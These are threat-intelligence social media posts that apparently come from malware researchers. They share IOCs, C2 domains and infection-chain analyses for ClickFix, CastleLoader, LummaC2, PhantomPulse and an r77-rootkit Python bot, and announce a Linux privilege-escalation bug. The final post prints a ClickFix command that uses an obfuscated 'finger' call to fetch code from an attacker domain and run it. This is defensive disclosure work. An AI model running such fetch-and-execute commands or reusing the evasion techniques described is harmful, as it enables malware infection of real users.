eKg_

Apparent WordPress compromise of popular restaurant chain #TGIFridays observed with #clickfix infection chain delivering malicious MSI disguised as "Microsoft Endpoint DLP Module" TGIF? 👾 #malware #clickfix @executemalware

> Strings/IOCs > some initial strings.. new_bot, bot_id, bot_pass, campaign_id, bot_version task_id, poll_and_execute, task_response > sha256 04cb9f0bca6e0e4ed30bc92726590724bf60938440b3825252657d1b3af45495 > c2 public key/cluster id also captured #malware #r77 #pyarmor

> Communications > bootstraps tor by downloading legit tor-expert-bundle from archive.torproject.org > uses rsa2048 + AES-GCM session crypto with signed payload verification > disables TLS certificate verification for every C2 request

> Stage5 > unpacks PyArmor for the bot itself > uses r77 userland rootkit to hide > registers PID and config keys with r77's known interfaces so r77's hooks filter it out of Task Manager and registry enumeration > c2 fallbacks > Tor > telegra[.]ph > rentry[.]org > HTTP > DGA

> Stage4 > creates persistence through task scheduler 2.0, specifically through COM calls > stores its config under HKCU\SOFTWARE\$77config, r77 rootkit namespace

> Stage3 > BIN2 is a fake WiX installer, compiled 4 days before analysis and is unsigned > contains legit python 3.14 installer and an obfuscated python payload > silent install of python, stages the bot under %LocalAppData%

> Stage2 > program runs and starts a couple of threads > (1) legit jdownloader installer > (2) after ~8 minutes of sleep for evasion, drops BIN2 to start menu programs LNK path, runs, deletes file once complete

> Stage1 > appears to be install4j but IAT is basically nothing, uses API hash resolution at runtime > strings hidden behind a rolling XOR (dll names, mutexes, etc) > 2 resources are used, legitimate installer (BIN1) and an encrypted inner launcher (BIN2) > uses XOR key "ectb"

> #jdownloader incident report (now resolved) > jdownloader.org/incident_8.5.2… > sample is a python remote-control bot that uses the r77 userland rootkit for potential botnet activity > calling this one #j77bot (unless it's already been identified/named!) > github.com/bytecode77/r77…

💥 Introducing "Dirty Frag" A universal Linux LPE chaining two vulns in xfrm-ESP and RxRPC. A successor class to Dirty Pipe & Copy Fail. No race, no panic on failure, fully deterministic. ~9 years latent. Ubuntu / RHEL / Fedora / openSUSE / CentOS / AlmaLinux, and more. Even if you've applied the "Copy Fail" mitigation, your Linux is still vulnerable to "Dirty Frag". Apply the Dirty Frag mitigation. Details: dirtyfrag.io

#malware #cybersecurity #lumma Fresh C2 domains used by LummaC2 infostealer: boletukk[.]cyou trotskxt[.]cyou brechfo[.]cyou cucumb[.]cyou crapuhn[.]cyou ditabop[.]cyou codbsd[.]cyou poxzxin[.]cyou elgccyx[.]cyou affimcm[.]cyou springvc[.]cyou psychozc[.]cyou pashtu[.]cyou 1/3

What I’m seeing from these tflux RMM campaigns: • ScreenConnect dropped • Splashtop dropped Chain I observed: 𝗺𝘀𝗶𝗲𝘅𝗲𝗰.𝗲𝘅𝗲 → drops 𝚃𝚒𝚂𝚎𝚛𝚟𝚒𝚌𝚎.𝚎𝚡𝚎 under 𝘗𝘳𝘰𝘨𝘳𝘢𝘮 𝘍𝘪𝘭𝘦𝘴 → PowerShell launches msiexec.exe → pulls remote 𝚂𝚌𝚛𝚎𝚎𝚗𝙲𝚘𝚗𝚗𝚎𝚌𝚝 MSI from 𝗵𝘅𝘅𝗽𝘀://𝗹𝗲𝗼𝗮𝗰𝗮𝗱𝗲𝗿𝗻𝘆𝘁𝗿𝘂𝘀𝘁[.]𝗰𝗼[.]𝘂𝗸 → 𝚂𝚌𝚛𝚎𝚎𝚗𝙲𝚘𝚗𝚗𝚎𝚌𝚝.𝙲𝚕𝚒𝚎𝚗𝚝𝚂𝚎𝚛𝚟𝚒𝚌𝚎.𝚎𝚡𝚎 executes through SCM → uses Guest / Access parameters → connects to 𝘃𝗶𝗰𝗸𝘆𝗻𝗲𝘄𝘀𝗰[.]𝘅𝘆𝘇:𝟴𝟬𝟰𝟭

#malware #cybersecurity #phantompulse #macos MacOS dropper of a tracked campaign named REF6598 that delivers the PhantomPulse RAT. C2 servers: pla7ina[.]cfd 0x666[.]info honestly[.]ink t[.]me/ax03bot -> acvgste[.]club Campaign monitor. Check it out: clickfix.pro

Update to pkilab.certgraveyard.org - I originally hadn't planned for the analysis reports to be sharable, but it turned out people liked sharing them. They are now permanent. - Added P7X support, which was omitted by accident

#cybersecurity #malware #clickfix #phantompulse Hi, I've brought you an update for clickfix.pro A new PHANTOMPULSE campaign has been added targeting macOS users and Obsidian. Read next post. An “Export” button has been added at the top (thx @500mk500 @Crose_96).

i should probably add to the noise and earn internet points like everybody else screaming about copy dot fail or mini shai hulud or cpanel hacks or github rce or password manager pwnage or codex goblins or zomg ai or whatever else is ‼️🚨BREAKING🚨‼️today but i'm just tired man

IOCs: cheeshoumreciple.]com:79 38.146.25.]206 brionter.]com 46.183.25.]73 4c290cf00fae4d504b43ceef2842ebf3096ad1ba36189a9db7093d86fd7b9d28

> Decrypted strings show functionality > machine_id, access_key, access_kt build_version, computer_name, launch_method install_path, package_name, run_as_admin wow64_bypass, send_finished_status send_execution_status, make_screenshots, zip_executable_files, av_list, active_av

> ClickFix -> CastleLoader -> CastleBot using Finger LOLBin > Stage 1 > "C:\WINDOWS\system32\cmd.exe" /c start "" /min for /f "skip=18 delims=" %T in ('f^^i^^n^^g^^e^^r NjoDPATzUB@cheeshoumreciple.]com') do %T & echo > 38.146.25.]206 #malware #clickfix #castleloader #castlebot